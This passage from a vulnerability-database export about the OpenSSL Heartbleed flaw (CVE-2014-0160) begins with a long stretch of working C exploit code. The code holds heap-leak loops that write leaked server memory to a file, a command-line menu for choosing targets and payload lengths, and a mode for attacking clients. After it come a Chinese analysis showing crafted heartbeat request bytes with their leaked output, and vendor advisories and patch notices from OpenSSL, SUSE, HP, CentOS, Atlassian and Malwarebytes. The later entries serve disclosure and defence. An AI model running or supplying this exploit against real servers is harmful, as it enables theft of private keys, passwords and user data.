}\r\n rr->off=0;\r\n s->packet_length=0;\r\n dtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n 
(long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n \r\n dtls1_stop_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_seq++;\r\n c->sslHandle->tlsext_hb_pending = 0;\r\n \r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n \r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n \r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n \r\n return NULL;\r\n 
}\r\n \r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n shift = -cmp;\r\n if (shift >= sizeof(bitmap->map)*8)\r\n return 0;\r\n else if (bitmap->map & (1UL<<shift))\r\n return 0;\r\n \r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n \r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{ int ret,sat,brw,i;\r\n \r\n if (sizeof(long) == 8) do\r\n { const union { long one; char little; } is_endian = {1};\r\n long l;\r\n \r\n if (is_endian.little) break;\r\n \r\n if (((size_t)v1|(size_t)v2)&0x7) break;\r\n \r\n l = *((long *)v1);\r\n l -= *((long *)v2);\r\n if (l>128) return 128;\r\n else if (l<-128) return -128;\r\n else return (int)l;\r\n } while (0);\r\n \r\n ret = (int)v1[7]-(int)v2[7];\r\n sat = 0;\r\n brw = ret>>8;\r\n if (ret & 0x80)\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= ~brw;\r\n brw >>= 8;\r\n }\r\n }\r\n else\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= brw;\r\n brw >>= 8;\r\n }\r\n }\r\n brw <<= 8;\r\n \r\n if (sat&0xff) return brw | 0x80;\r\n else return brw + (ret&0xFF);\r\n}\r\n \r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n {\r\n DTLS1_RECORD_DATA *rdata;\r\n pitem *item;\r\n \r\n if (pqueue_size(queue->q) >= 100)\r\n return 0;\r\n \r\n rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n item = pitem_new(priority, rdata);\r\n if (rdata == NULL || item == NULL)\r\n {\r\n if (rdata != NULL) OPENSSL_free(rdata);\r\n if (item != NULL) pitem_free(item);\r\n \r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n return(0);\r\n }\r\n \r\n rdata->packet = s->packet;\r\n rdata->packet_length = s->packet_length;\r\n memcpy(&(rdata->rbuf), &(s->s3->rbuf), 
sizeof(SSL3_BUFFER));\r\n memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n \r\n item->data = rdata;\r\n \r\n#ifndef OPENSSL_NO_SCTP\r\n if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n }\r\n#endif\r\n \r\n if (pqueue_insert(queue->q, item) == NULL)\r\n {\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n s->packet = NULL;\r\n s->packet_length = 0;\r\n memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n \r\n if (!ssl3_setup_buffers(s))\r\n {\r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n return(1);\r\n }\r\n \r\n \r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n shift = cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map <<= shift, bitmap->map |= 1UL;\r\n else\r\n bitmap->map = 1UL;\r\n memcpy(bitmap->max_seq_num,seq,8);\r\n }\r\n else {\r\n shift = -cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map |= 1UL<<shift;\r\n }\r\n }\r\n \r\n \r\nvoid usage(){\r\n printf(\"[\\n\");\r\n printf(\"[ --server|-s <ip/dns> - the server to target\\n\");\r\n printf(\"[ --port|-p <port> - the port to target\\n\");\r\n printf(\"[ --file|-f <filename> - file to write data to\\n\");\r\n printf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\r\n printf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\r\n printf(\"[ 0 = SMTP\\n\");\r\n printf(\"[ 1 = POP3\\n\");\r\n printf(\"[ 2 = IMAP\\n\");\r\n printf(\"[ --loop|-l - loop the exploit attempts\\n\");\r\n printf(\"[ --type|-t <n> - 
select exploit to try\\n\");\r\n printf(\"[ 0 = null length\\n\");\r\n printf(\"[ 1 = max leak\\n\");\r\n printf(\"[ n = heartbeat payload_length\\n\");\r\n printf(\"[ --udp|-u - use dtls/udp\\n\");\r\n printf(\"[\\n\");\r\n printf(\"[ --verbose|-v - output leak to screen\\n\");\r\n printf(\"[ --help|-h - this output\\n\");\r\n printf(\"[\\n\");\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char* argv[]){\r\n int ret, port, userc, index;\r\n int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n int loop = 0;\r\n struct hostent *h;\r\n connection* c;\r\n char *host, *file;\r\n int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n printf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\r\n printf(\"[ =============================================================\\n\");\r\n static struct option options[] = {\r\n {\"server\", 1, 0, 's'},\r\n {\"port\", 1, 0, 'p'},\r\n {\"file\", 1, 0, 'f'},\r\n {\"type\", 1, 0, 't'},\r\n {\"bind\", 1, 0, 'b'},\r\n {\"verbose\", 0, 0, 'v'},\r\n {\"precmd\", 1, 0, 'c'},\r\n {\"loop\", 0, 0, 'l'},\r\n {\"help\", 0, 0,'h'},\r\n {\"udp\", 0, 0, 'u'}\r\n };\r\n while(userc != -1) {\r\n userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \r\n switch(userc) {\r\n case -1:\r\n break;\r\n case 's':\r\n if(ihost==0){\r\n ihost = 1;\r\n h = gethostbyname(optarg); \r\n if(h==NULL){\r\n printf(\"[!] 
FATAL: unknown host '%s'\\n\",optarg);\r\n exit(1);\r\n }\r\n host = malloc(strlen(optarg) + 1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n }\r\n break;\r\n case 'p':\r\n if(iport==0){\r\n port = atoi(optarg);\r\n iport = 1;\r\n }\r\n break;\r\n case 'f':\r\n if(ifile==0){\r\n file = malloc(strlen(optarg) + 1);\r\n if(file==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(file,\"%s\",optarg);\r\n ifile = 1;\r\n }\r\n break;\r\n case 't':\r\n if(itype==0){\r\n type = atoi(optarg);\r\n itype = 1;\r\n }\r\n break;\r\n case 'h':\r\n usage();\r\n break;\r\n case 'b':\r\n if(ihost==0){\r\n ihost = 1;\r\n host = malloc(strlen(optarg)+1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n bind = 1;\r\n }\r\n break;\r\n case 'c':\r\n if(iprecmd == 0){\r\n iprecmd = 1;\r\n precmd = atoi(optarg);\r\n }\r\n break;\r\n case 'v':\r\n verbose = 1;\r\n break;\r\n case 'l':\r\n loop = 1;\r\n break;\r\n case 'u':\r\n udp = 1;\r\n break;\r\n \r\n default:\r\n break;\r\n }\r\n }\r\n if(ihost==0||iport==0||ifile==0||itype==0){\r\n printf(\"[ try --help\\n\");\r\n exit(0);\r\n }\r\n ssl_init();\r\n if(bind==0){\r\n if (udp){\r\n c = dtls_client(ret, host, port);\r\n dtlsheartbleed(c, type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_connect(host, port);\r\n pre_cmd(ret, precmd, verbose);\r\n c = tls_connect(ret);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n 
sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n \r\n SSL_shutdown(c->sslHandle);\r\n close (ret);\r\n SSL_free(c->sslHandle);\r\n }\r\n else{\r\n int sd, pid, i;\r\n if (udp) {\r\n c = dtls_server(sd, host, port);\r\n while (1) {\r\n char * bytes = malloc(1024);\r\n struct sockaddr_in peer;\r\n socklen_t len = sizeof(peer);\r\n if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n dtlsheartbleed(c,type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_bind(host, port);\r\n while(1){\r\n sd=accept(ret,0,0);\r\n if(sd==-1){\r\n printf(\"[!] FATAL: problem with accept()\\n\");\r\n exit(0);\r\n }\r\n if(pid=fork()){\r\n close(sd);\r\n }\r\n else{\r\n c = tls_bind(sd);\r\n pre_cmd(ret, precmd, verbose);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n printf(\"[ done.\\n\");\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n}\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22172"}], "myhack58": [{"lastseen": "2016-11-02T19:48:51", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "Author: yaoxi original source http://blog.wangzhan.360.cn/\n\nRecently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named\u201cheart bleed\u201dvulnerability. 
According to the 360 Website Guard security team's analysis of the vulnerability, it concerns not only URLs beginning with https, but also products and services that use the OpenSSL code indirectly, such as VPNs, mail systems, FTP tools and other products and services, and may even concern the source code of some other security facilities.\n\nAffected versions\n\nOpenSSL 1.0.1, 1.0.1a, 1.0.1b, 1.0.1c, 1.0.1d, 1.0.1e, 1.0.1f, OpenSSL 1.0.2 Beta 1 and other versions.\n\nVulnerability detail description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n\nVulnerability description\n\nThere is a coding defect in OpenSSL's implementation of the TLS and DTLS heartbeat processing logic. The heartbeat processing logic does not check whether the length field of a heartbeat packet is consistent with the data field that follows it, so an attacker can send a malformed packet and obtain the data that follows the heartbeat data in memory. This data may contain the certificate private key, user names, user passwords, user email and other sensitive information. The vulnerability allows an attacker to read up to 64KB of data from memory.\n\nThe vulnerability analysis articles of the past few days focused mainly on HTTPS websites, so ordinary users may think that only websites' own services are affected by this vulnerability. From 3 6 0 websites guards Openssl effort loophole online testing platform(wangzhan. 3 6 0. 
cn/heartbleed)monitoring data that, effort to exploit the range of radiation has been from the open HTTPS site extends to the VPN system and the mail system, The current Total Domestic total 2 5 1 a VPN system and a 7 2 5 a mail system to the presence of the same vulnerability, including many government websites, key universities and related security vendors.\n\nIn order to better allow everyone to understand that the Openssl effort loophole in the end is which aspects of a problem, we use the OpenSSL lib library to write a does not depend on any business separate server program, a step-by-step the actual debug over the code, in order to prove that not only is the https site has a problem, as long as the use of the existence of the vulnerability in the OpenSSL libssl. so the gallery app there are security vulnerabilities that!\n\nThe test environment\n\nOS: CentOS release 6.4 (Final)\n\nOpenSSL: Version 1.0.1 f Do not open the OPENSSL_NO_HEARTBEATS compile options\n\nWrite a Server program: monitor port 9 8 7 6\n\nVulnerability testing\n\nUse the online python validation script https://gist.github.com/RixTox/10222402 test\n\nStructural abnormalities of the heartbeat data packet, mainly to add the exception of the length field value.\n\nTest one:\n\nHeartBeat Requst packet\n\nhb = h2bin(\u201d\u2019\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 2 0 0 0\n\n\u201d\u2019)\n\nBlue 0 1 represents the heartbeat packet of type request direction. The corresponding source code is #define TLS1_HB_REQUEST 1\n\nRed 2 0 0 0 indicates that the heartbeat request packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of.\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... 
received message: type = 2 4, ver = 0 3 0 2, length = 8 2 1 1\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 2 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C. .... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nBlue 0 2 represents the heartbeat packet type response direction.\n\nThe corresponding source code is #define TLS1_HB_RESPONSE 2\n\nRed 2 0 0 0 represented by the heartbeat response packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of. And the request packet length value.\n\nThe green part is the illegal access to cross-border data(which may include Username, Password, e-mail, internal network IP and other sensitive information).\n\nTest two:\n\nIn the test on the basis of one, modify the request heartbeat packets, the length field's value from 2 to 0 0 0 to 3 0 0 0\n\nHeartBeat Requst packet\n\nhb = h2bin(\"'\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 3 0 0 0\n\n\"')\n\n3 0 0 0 two bytes corresponding to the length 1 2 2 8 8 out of 8 1 9 2+4 0 9 6\uff09\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 1 2 3 0 7\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 3 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C .0.... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... 
f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nIn both test cases the length of the response is always 19 bytes greater than the request length. Why?\n\nBecause in the TLS and DTLS logic that handles a heartbeat request packet of type TLS1_HB_REQUEST, the size of the memory allocated from the heap is determined by 4 parts: type + length + request data length + pad. The type, length and pad fields account for 1 byte, 2 bytes and 16 bytes respectively, so the response data is always 19 bytes longer than the request.\n\nSource code analysis\n\nOutline\n\nThe vulnerability is essentially a memory disclosure (out-of-bounds read) problem. The root cause is that, when handling a heartbeat request packet, OpenSSL does not check the length field (2 bytes, so it can declare up to 64KB of data) against the data field that follows it. When generating the heartbeat response packet, it allocates heap memory directly from the declared length, even when the real request data is much shorter than the length declared.\n\nDescription of the relevant source code\n\nThe vulnerability exists in two source files: ssl/d1_both.c and ssl/t1_lib.c.\n\nThe heartbeat processing logic is in two functions, dtls1_process_heartbeat and tls1_process_heartbeat, respectively.\n\ndtls1_process_heartbeat function processing logic:\n\nStep1. Get a pointer to the data field of the SSLv3 record that carries the heartbeat request; it points at the data portion of the request.\n\nunsigned char *p = &s->s3->rrec. 
data[0];\n\nrecord the data format should contain three fields: type, length, data; respectively accounted for 1byte and 2byte, the length of the actual value.\n\n**[1] [[2]](<44409_2.htm>) [next](<44409_2.htm>)**\n", "edition": 1, "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "MYHACK58:62201444409", "href": "http://www.myhack58.com/Article/html/3/62/2014/44409.htm", "type": "myhack58", "title": "Than imagined more terror! OpenSSL\u201ceffort\u201dvulnerability in-depth analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openssl": [{"lastseen": "2020-09-14T11:36:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": " A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server (a.k.a. Heartbleed). This issue did not affect versions of OpenSSL prior to 1.0.1. Reported by Neel Mehta. 
\n\n * Fixed in OpenSSL 1.0.1g (Affected 1.0.1-1.0.1f)\n", "edition": 1, "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENSSL:CVE-2014-0160", "href": "https://www.openssl.org/news/secadv/20140407.txt", "title": "Vulnerability in OpenSSL - TLS heartbeat read overrun ", "type": "openssl", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\n\n", "edition": 1, "modified": "2014-04-08T13:04:15", "published": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "title": "update for openssl (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "atlassian": [{"lastseen": "2019-05-29T17:29:03", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Cloud*. Using *JIRA Server*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-38927].\n {panel}\n\n\n{quote}\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\n\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\n{quote}\n\n*Note*\nThis is related to the Heartbleed vulnerability. 
Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "edition": 9, "modified": "2019-04-16T03:53:37", "published": "2014-06-26T19:39:26", "id": "ATLASSIAN:JRACLOUD-38927", "href": "https://jira.atlassian.com/browse/JRACLOUD-38927", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hp": [{"lastseen": "2020-06-22T12:49:28", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "## Potential Security Impact\nRemote disclosure of information\n\n## VULNERABILITY SUMMARY\nThe \u201cHeartbleed\u201d vulnerability was detected in specific OpenSSL versions. OpenSSL is a 3rd party product that is embedded with some of HP products. This bulletin\u2019s objective is to notify HP customers about certain HP Thin Client class of products affected by the \u201cHeartbleed\u201d vulnerability. HP will continue to release additional bulletins advising customers about other HP products\n\n> note:\n> \n> The \u201cHeartbleed\u201d vulnerability (CVE-2014-0160) is a vulnerability found in the OpenSSL cryptographic software library. This weakness potentially allows disclosure of information that is normally protected by the SSL/TLS protocol. The impacted products in the list below are vulnerable due to embedding OpenSSL standard release software.\n\n## RESOLUTION\nHP has released a patch to address this vulnerability for the impacted versions HP ThinPro OS version 4.4 and HP Smart Zero Core Services version 4.4. 
\n\nThe patch is available here: <ftp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/openssl-service-pack-1.0-all-4.4-x86.xar>\n", "edition": 1, "modified": "2014-04-24T00:00:00", "published": "2014-04-23T00:00:00", "id": "HP:C04262670", "href": "https://support.hp.com/us-en/document/c04262670", "title": "HPSBHF03021 rev.1 - HP Thin Client with ThinPro OS or Smart Zero Core Services, Running OpenSSL, Remote Disclosure of Information", "type": "hp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-24T13:21:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "## Potential Security Impact\nRemote disclosure of information \n\n## VULNERABILITY SUMMARY\nA potential vulnerability exists in HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP Printers. This is the OpenSSL vulnerability known as \"Heartbleed\" (CVE-2014-0160) which could be exploited remotely resulting in disclosure of information.\n\n## RESOLUTION\nHP has provided firmware updates that address this vulnerability. Please see the table below. To obtain the updated firmware, go to the HP Software and Drivers page for your product and find the firmware update from the list of available software. 
\n\nProduct Name \n\n| \n\nModel Number \n\n| \n\nFirmware Revision \n \n---|---|--- \n \nProduct Name \n\n| \n\nModel \n\n| \n\nFirmware Update Version \n \nHP LaserJet Pro M435nw Multifunction Printer \n\n| \n\nA3E42A \n\n| \n\nv 20140411 (or higher) \n \nHP LaserJet Pro 500 color MFP M570 \n\n| \n\nCZ271A, CZ272A \n\n| \n\nv 20140411 (or higher) \n \nHP LaserJet Pro M521 Multifunction Printer \n\n| \n\nA8P79A, A8P80A \n\n| \n\nv 20140411 (or higher) \n \nHP Color LaserJet Pro MFP M476 \n\n| \n\nCF387A, CF386A, CF385A \n\n| \n\nv 20140410 (or higher) \n \nHP LaserJet Pro M701/M706 Printer \n\n| \n\nB6S00A, B6S01A, B6S02A \n\n| \n\nv 20140411 (or higher) \n", "edition": 3, "modified": "2017-07-13T00:00:00", "published": "2014-04-22T00:00:00", "id": "HP:C04262495", "href": "https://support.hp.com/us-en/document/c04262495", "title": "HPSBPI03014 rev.2 - HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP Printers, Remote Disclosure of Information", "type": "hp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:23:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. 
(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032287.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "edition": 3, "modified": "2014-04-08T02:54:58", "published": "2014-04-08T02:54:58", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032287.html", "id": "CESA-2014:0376", "title": "openssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "malwarebytes": [{"lastseen": "2019-09-16T21:30:59", "bulletinFamily": "blog", "cvelist": ["CVE-2014-0160"], "description": "The Heartbleed vulnerability was introduced into the OpenSSL crypto library in 2012. It was discovered and fixed in 2014, yet today\u2014five years later\u2014[there are still unpatched systems](<https://www.securityweek.com/heartbleed-still-affects-200000-devices-shodan>). \n\n\nThis article will provide IT teams with the necessary information to decide whether or not to apply the Heartbleed vulnerability fix. However, we caution: The latter could leave your users\u2019 data exposed to future attacks. \n\n### What is the Heartbleed vulnerability?\n\nHeartbleed is a code flaw in the OpenSSL cryptography library. 
This is what it looks like:\n \n \n memcpy(bp, pl, payload);\n\nIn 2014, a vulnerability was found in [OpenSSL](<https://www.openssl.org/blog/blog/2015/09/28/critical-security-level/>), which is a popular cryptography library. OpenSSL provides developers with tools and resources for the implementation of the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. \n\n\nWebsites, emails, instant messaging (IM) applications, and [virtual private networks (VPNs)](<https://blog.malwarebytes.com/glossary/vpn/>) rely on SSL and TLS protocols for security and privacy of communication over the Internet. Applications with OpenSSL components were exposed to the Heartbleed vulnerability. At the time of discovery, that was 17 percent of all SSL servers. \n\n\nUpon discovery, the vulnerability was given the official vulnerability identifier CVE-2014-0160, but it\u2019s more commonly known by the name Heartbleed. The latter was invented by an engineer from Codenomicon, who was one of the people that discovered the vulnerability. \n\n\nThe name Heartbleed is derived from the source of the vulnerability\u2014a buggy implementation of the RFC 6520 Heartbeat extension, which is part of the OpenSSL implementation of the SSL and TLS protocols.\n\n### Heartbleed vulnerability behavior\n\nThe Heartbleed vulnerability weakens the security of the most common Internet communication protocols ([SSL and TLS](<https://www.globalsign.com/en/blog/ssl-vs-tls-difference/>)). Websites affected by Heartbleed allow potential attackers to read their memory. That means the encryption keys could be found by savvy cybercriminals. \n\n\nWith the encryption keys exposed, threat actors could gain access to the credentials\u2014such as names and passwords\u2014required to hack into systems. 
